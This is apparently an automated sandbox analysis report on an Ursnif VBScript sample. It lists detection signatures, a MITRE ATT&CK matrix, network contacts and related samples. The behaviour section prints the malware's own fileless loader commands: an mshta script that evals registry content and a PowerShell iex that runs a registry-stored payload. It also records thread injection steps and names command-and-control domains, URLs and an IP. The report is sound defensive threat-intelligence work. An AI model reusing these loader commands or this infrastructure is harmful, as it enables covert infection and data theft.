                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Local\Temp\hvjfk3yo\hvjfk3yo.0.csJump to dropped file
                      Modifies the context of a thread in another process (thread injection)Show sources
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 3388Jump to behavior
                      Creates a thread in another existing process (thread injection)Show sources
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: unknown EIP: 736E1580Jump to behavior
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>F67r='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F67r).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.cmdline'Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESFECC.tmp' 'c:\Users\user\AppData\Local\Temp\1cv1ijms\CSC65E6130637C74F63B377719165F577CE.TMP'Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 34_2_01206CD6 cpuid 34_2_01206CD6
                      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 34_2_0120682B HeapCreate,GetTickCount,GetSystemTimeAsFileTime,SwitchToThread,_aullrem,Sleep,IsWow64Process,34_2_0120682B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 34_2_01205A5D GetVersion,lstrcat,lstrcat,lstrcat,GetLastError,34_2_01205A5D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 34_2_01206CD6 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,34_2_01206CD6
                      Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmpBinary or memory string: procmon.exe
                      Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmpBinary or memory string: tcpview.exe
                      Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmpBinary or memory string: wireshark.exe
                      Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmpBinary or memory string: avz.exe
                      Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmpBinary or memory string: cports.exe
                      Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmpBinary or memory string: lordpe.exe
                      Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmpBinary or memory string: icesword.exe
                      Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmpBinary or memory string: ollydbg.exe
                      Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmpBinary or memory string: regshot.exe

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000022.00000003.629988077.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.629867995.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.630014606.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.636741172.000000000556C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.629893415.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.630002882.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.629914117.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.629947951.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.632901205.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.629835886.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 3128, type: MEMORYSTR
                      Source: Yara matchFile source: 34.3.rundll32.exe.566a4a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.3.rundll32.exe.5718d48.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.3.rundll32.exe.566a4a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.3.rundll32.exe.5718d48.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.3.rundll32.exe.56e94a0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.635124598.00000000056E9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.635073393.000000000566A000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.678786013.00000000053EF000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000027.00000002.699212470.0000019D9BA17000.00000004.00000001.sdmp, type: MEMORY

                      Remote Access Functionality:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000022.00000003.629988077.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.629867995.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.630014606.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.636741172.000000000556C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.629893415.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.630002882.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.629914117.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.629947951.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.632901205.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.629835886.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 3128, type: MEMORYSTR
                      Source: Yara matchFile source: 34.3.rundll32.exe.566a4a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.3.rundll32.exe.5718d48.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.3.rundll32.exe.566a4a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.3.rundll32.exe.5718d48.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.3.rundll32.exe.56e94a0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.635124598.00000000056E9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.635073393.000000000566A000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.678786013.00000000053EF000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000027.00000002.699212470.0000019D9BA17000.00000004.00000001.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation221Path InterceptionProcess Injection511Disable or Modify Tools1Credential API Hooking3System Time Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationData Encrypted for Impact1
                      Default AccountsScripting121Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsScripting121LSASS MemoryAccount Discovery1Remote Desktop ProtocolEmail Collection1Exfiltration Over BluetoothEncrypted Channel2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsExploitation for Client Execution1Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information2Security Account ManagerFile and Directory Discovery1SMB/Windows Admin SharesCredential API Hooking3Automated ExfiltrationNon-Application Layer Protocol4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsCommand and Scripting Interpreter1Logon Script (Mac)Logon Script (Mac)File Deletion1NTDSSystem Information Discovery46Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol14SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsPowerShell1Network Logon ScriptNetwork Logon ScriptRootkit4LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading11Cached Domain CredentialsSecurity Software Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsModify Registry1DCSyncVirtualization/Sandbox Evasion41Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion41Proc FilesystemProcess Discovery2Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection511/etc/passwd and /etc/shadowApplication Window Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Rundll321Network SniffingSystem Owner/User Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                      Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput CaptureRemote System Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 480986 Sample: start[526268].vbs Startdate: 10/09/2021 Architecture: WINDOWS Score: 100 44 art.microsoftsofymicrosoftsoft.at 2->44 46 resolver1.opendns.com 2->46 50 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->50 52 Multi AV Scanner detection for domain / URL 2->52 54 Found malware configuration 2->54 56 12 other signatures 2->56 9 mshta.exe 19 2->9         started        12 wscript.exe 2 2->12         started        15 WmiPrvSE.exe 2->15         started        17 2 other processes 2->17 signatures3 process4 file5 66 Suspicious powershell command line found 9->66 19 powershell.exe 2 29 9->19         started        42 C:\Users\user\AppData\Local\Temp\fum.cpp, PE32 12->42 dropped 68 Benign windows process drops PE files 12->68 70 VBScript performs obfuscated calls to suspicious functions 12->70 72 Deletes itself after installation 12->72 74 Creates processes via WMI 12->74 23 rundll32.exe 15->23         started        signatures6 process7 file8 36 C:\Users\user\AppData\Local\...\hvjfk3yo.0.cs, UTF-8 19->36 dropped 38 C:\Users\user\AppData\...\1cv1ijms.cmdline, UTF-8 19->38 dropped 58 Modifies the context of a thread in another process (thread injection) 19->58 60 Maps a DLL or memory area into another process 19->60 62 Compiles code for process injection (via .Net compiler) 19->62 64 Creates a thread in another existing process (thread injection) 19->64 25 csc.exe 3 19->25         started        28 conhost.exe 19->28         started        30 rundll32.exe 23->30         started        signatures9 process10 dnsIp11 40 C:\Users\user\AppData\Local\...\1cv1ijms.dll, PE32 25->40 dropped 34 cvtres.exe 1 25->34         started        48 atl.bigbigpoppa.com 185.251.90.253, 49790, 49791, 49792 SPRINTHOSTRU Russian Federation 30->48 76 System process connects to network (likely due to code injection or exploit) 30->76 78 Writes registry values via WMI 30->78 file12 signatures13 process14

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      No Antivirus matches

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      34.2.rundll32.exe.1200000.0.unpack100%AviraHEUR/AGEN.1108168Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      art.microsoftsofymicrosoftsoft.at4%VirustotalBrowse
                      atl.bigbigpoppa.com9%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                      http://art.microsoftsofymicrosoftsoft.at/fpsVrgA85_2/BZUV9Iws3c_2Fj/GkkWmnklFKPgFBQ8hMP6W/ISGgirn8yOZisrZs/5_2BH8scRlnvRek/EGKptIwp8lSo93GFx6/ymWkd9jdg/4KpkPYuuZAAAek8BuLEK/tznSDyfWtC0KjQGP2d_/2BrsiHfOmQlV7YgPTes0MP/b6lv_2B55mg9j/CZcF_2Fn/c7jP_2BxBvmhfldW4gAwZkY/uow0BznEMg/Wu3a_2FnHyKBj_2BJ/8ZnXzqvUM8Ze/cMFtkguu1z4/ENTz8901wZ21V2/97iMfuV3Gozq6_2FCxmu3/2vuyb0vOGb_2B1J_/2BS8kN2df/902r0%Avira URL Cloudsafe
                      http://atl.bigbigpoppa.com/NhQOwDmOWNWhoZkCuvIJYT/yyrgcNktQOio5/MAWNnOPh/YOpi6p7HZNMrM8dfCZNfhKR/6onGC0_2Fj/Z9tF912mepKiyl36W/W4huWMRggYfW/XcsWaKpGEUD/RLGSHFoZE1byyc/rlBcayy_2BaEyDegqhXic/uK_2B61p_2BSvpFm/KyqmkPSMKG7KXQh/rKyHlYF1pKbQ_2FrYs/GJ_2FCBgc/9AGhinNAfGtoNp19N2M0/VRQmCiVDj4baSUAqCoz/3V8nTzokn2tRxlMEPZAuLu/2tgH0PvXzWJgh/YQdIJgxg/bNHS_2BzqfAV52iuY_2FTg4/1Z1d8SkfRiehoMkV7n/yUZu100%Avira URL Cloudmalware
                      https://contoso.com/0%URL Reputationsafe
                      https://contoso.com/License0%URL Reputationsafe
                      https://contoso.com/Icon0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      resolver1.opendns.com
                      		208.67.222.222
                      		truefalse
                        		high
                        art.microsoftsofymicrosoftsoft.at
                        		185.251.90.253
                        		truetrueunknown
                        atl.bigbigpoppa.com
                        		185.251.90.253
                        		truetrueunknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://art.microsoftsofymicrosoftsoft.at/fpsVrgA85_2/BZUV9Iws3c_2Fj/GkkWmnklFKPgFBQ8hMP6W/ISGgirn8yOZisrZs/5_2BH8scRlnvRek/EGKptIwp8lSo93GFx6/ymWkd9jdg/4KpkPYuuZAAAek8BuLEK/tznSDyfWtC0KjQGP2d_/2BrsiHfOmQlV7YgPTes0MP/b6lv_2B55mg9j/CZcF_2Fn/c7jP_2BxBvmhfldW4gAwZkY/uow0BznEMg/Wu3a_2FnHyKBj_2BJ/8ZnXzqvUM8Ze/cMFtkguu1z4/ENTz8901wZ21V2/97iMfuV3Gozq6_2FCxmu3/2vuyb0vOGb_2B1J_/2BS8kN2df/902rtrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://atl.bigbigpoppa.com/NhQOwDmOWNWhoZkCuvIJYT/yyrgcNktQOio5/MAWNnOPh/YOpi6p7HZNMrM8dfCZNfhKR/6onGC0_2Fj/Z9tF912mepKiyl36W/W4huWMRggYfW/XcsWaKpGEUD/RLGSHFoZE1byyc/rlBcayy_2BaEyDegqhXic/uK_2B61p_2BSvpFm/KyqmkPSMKG7KXQh/rKyHlYF1pKbQ_2FrYs/GJ_2FCBgc/9AGhinNAfGtoNp19N2M0/VRQmCiVDj4baSUAqCoz/3V8nTzokn2tRxlMEPZAuLu/2tgH0PvXzWJgh/YQdIJgxg/bNHS_2BzqfAV52iuY_2FTg4/1Z1d8SkfRiehoMkV7n/yUZutrue
                        • Avira URL Cloud: malware
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://nuget.org/NuGet.exepowershell.exe, 00000027.00000002.698930392.0000019D9B8AE000.00000004.00000001.sdmpfalse
                          		high
                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000027.00000002.678851072.0000019D8BA60000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000027.00000002.678446802.0000019D8B851000.00000004.00000001.sdmpfalse
                            		high
                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000027.00000002.678851072.0000019D8BA60000.00000004.00000001.sdmpfalse
                              		high
                              https://github.com/Pester/Pesterpowershell.exe, 00000027.00000002.678851072.0000019D8BA60000.00000004.00000001.sdmpfalse
                                		high
                                https://contoso.com/powershell.exe, 00000027.00000002.698930392.0000019D9B8AE000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://nuget.org/nuget.exepowershell.exe, 00000027.00000002.698930392.0000019D9B8AE000.00000004.00000001.sdmpfalse
                                  		high
                                  https://contoso.com/Licensepowershell.exe, 00000027.00000002.698930392.0000019D9B8AE000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://contoso.com/Iconpowershell.exe, 00000027.00000002.698930392.0000019D9B8AE000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown

                                  Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public

                                  IPDomainCountryFlagASNASN NameMalicious
                                  185.251.90.253
                                  		art.microsoftsofymicrosoftsoft.atRussian Federation
                                  		35278SPRINTHOSTRUtrue

                                  General Information

                                  Joe Sandbox Version:33.0.0 White Diamond
                                  Analysis ID:480986
                                  Start date:10.09.2021
                                  Start time:06:58:09
                                  Joe Sandbox Product:CloudBasic
                                  Overall analysis duration:0h 8m 18s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Sample file name:start[526268].vbs
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                  Number of analysed new started processes analysed:43
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Detection:MAL
                                  Classification:mal100.troj.evad.winVBS@17/16@6/1
                                  EGA Information:Failed
                                  HDC Information:
                                  • Successful, ratio: 96.5% (good quality ratio 92.1%)
                                  • Quality average: 80%
                                  • Quality standard deviation: 29.1%
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 64
                                  • Number of non-executed functions: 21
                                  Cookbook Comments:
                                  • Adjust boot time
                                  • Enable AMSI
                                  • Found application associated with file extension: .vbs
                                  • Override analysis time to 240s for JS/VBS files not yet terminated
                                  Warnings:
                                  Show All
                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe, wuapihost.exe
                                  • Excluded IPs from analysis (whitelisted): 23.211.6.115, 23.211.4.86, 20.50.102.62, 40.112.88.60, 80.67.82.235, 80.67.82.211, 20.54.110.249
                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  07:01:45API Interceptor1x Sleep call for process: wscript.exe modified
                                  07:02:18API Interceptor3x Sleep call for process: rundll32.exe modified
                                  07:02:28API Interceptor44x Sleep call for process: powershell.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  185.251.90.253URS8.VBSGet hashmaliciousBrowse
                                    documentation_446618.vbsGet hashmaliciousBrowse
                                      start_information[754877].vbsGet hashmaliciousBrowse
                                        start[873316].vbsGet hashmaliciousBrowse
                                          documentation[979729].vbsGet hashmaliciousBrowse
                                            run_documentation[820479].vbsGet hashmaliciousBrowse
                                              run[476167].vbsGet hashmaliciousBrowse
                                                run_presentation[645872].vbsGet hashmaliciousBrowse
                                                  documentation[979729].vbsGet hashmaliciousBrowse

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    resolver1.opendns.comdocumentation_446618.vbsGet hashmaliciousBrowse
                                                    • 208.67.222.222
                                                    start[873316].vbsGet hashmaliciousBrowse
                                                    • 208.67.222.222
                                                    6bI5jJ1oIXeI.vbsGet hashmaliciousBrowse
                                                    • 208.67.222.222
                                                    nostalgia.dllGet hashmaliciousBrowse
                                                    • 208.67.222.222
                                                    Lbh0K9szYgv5.vbsGet hashmaliciousBrowse
                                                    • 208.67.222.222
                                                    ursi.vbsGet hashmaliciousBrowse
                                                    • 208.67.222.222
                                                    OcEyzBswGm.exeGet hashmaliciousBrowse
                                                    • 208.67.222.222
                                                    u0So5MG5rkxx.vbsGet hashmaliciousBrowse
                                                    • 208.67.222.222
                                                    PIfkvZ5Gh6PO.vbsGet hashmaliciousBrowse
                                                    • 208.67.222.222
                                                    Ry1j2eCohwtN.vbsGet hashmaliciousBrowse
                                                    • 208.67.222.222
                                                    Invoice778465.xlsbGet hashmaliciousBrowse
                                                    • 208.67.222.222
                                                    9uHDrMnFYKhh.vbsGet hashmaliciousBrowse
                                                    • 208.67.222.222
                                                    ursnif.vbsGet hashmaliciousBrowse
                                                    • 208.67.222.222
                                                    8ph6zaHVzRpV.vbsGet hashmaliciousBrowse
                                                    • 208.67.222.222
                                                    Cetu9U5nJ7Fc.vbsGet hashmaliciousBrowse
                                                    • 208.67.222.222
                                                    vntfeq.dllGet hashmaliciousBrowse
                                                    • 208.67.222.222
                                                    231231232.dllGet hashmaliciousBrowse
                                                    • 208.67.222.222
                                                    gbgr.dllGet hashmaliciousBrowse
                                                    • 208.67.222.222
                                                    B9C23PuJnfNI.vbsGet hashmaliciousBrowse
                                                    • 208.67.222.222
                                                    payment_verification_99351.vbsGet hashmaliciousBrowse
                                                    • 208.67.222.222
                                                    art.microsoftsofymicrosoftsoft.atdocumentation_446618.vbsGet hashmaliciousBrowse
                                                    • 185.251.90.253
                                                    start[873316].vbsGet hashmaliciousBrowse
                                                    • 185.251.90.253
                                                    6bI5jJ1oIXeI.vbsGet hashmaliciousBrowse
                                                    • 194.226.139.129
                                                    nostalgia.dllGet hashmaliciousBrowse
                                                    • 194.226.139.129
                                                    Lbh0K9szYgv5.vbsGet hashmaliciousBrowse
                                                    • 194.226.139.129
                                                    ursi.vbsGet hashmaliciousBrowse
                                                    • 193.187.173.154
                                                    u0So5MG5rkxx.vbsGet hashmaliciousBrowse
                                                    • 193.187.173.154
                                                    PIfkvZ5Gh6PO.vbsGet hashmaliciousBrowse
                                                    • 193.187.173.154
                                                    Ry1j2eCohwtN.vbsGet hashmaliciousBrowse
                                                    • 185.180.231.210
                                                    Invoice778465.xlsbGet hashmaliciousBrowse
                                                    • 185.180.231.210
                                                    9uHDrMnFYKhh.vbsGet hashmaliciousBrowse
                                                    • 185.180.231.210
                                                    ursnif.vbsGet hashmaliciousBrowse
                                                    • 185.180.231.210
                                                    8ph6zaHVzRpV.vbsGet hashmaliciousBrowse
                                                    • 185.180.231.210
                                                    Cetu9U5nJ7Fc.vbsGet hashmaliciousBrowse
                                                    • 185.180.231.210
                                                    vntfeq.dllGet hashmaliciousBrowse
                                                    • 95.181.163.74
                                                    231231232.dllGet hashmaliciousBrowse
                                                    • 95.181.163.74
                                                    gbgr.dllGet hashmaliciousBrowse
                                                    • 95.181.163.74
                                                    B9C23PuJnfNI.vbsGet hashmaliciousBrowse
